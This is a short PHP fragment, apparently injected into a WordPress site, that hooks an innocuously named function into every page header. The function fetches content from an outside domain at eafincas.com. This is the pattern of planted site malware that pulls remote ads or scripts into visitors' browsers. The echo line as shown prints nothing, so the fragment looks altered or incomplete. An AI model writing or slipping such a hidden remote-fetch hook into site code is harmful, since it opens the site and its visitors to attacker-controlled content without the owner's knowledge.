function ti_custom_javascript() { $link=file_get_contents('https://eafincas.com/ads.php'); if($link !== false) { echo ""; } } add_action('wp_head', 'ti_custom_javascript'); ?>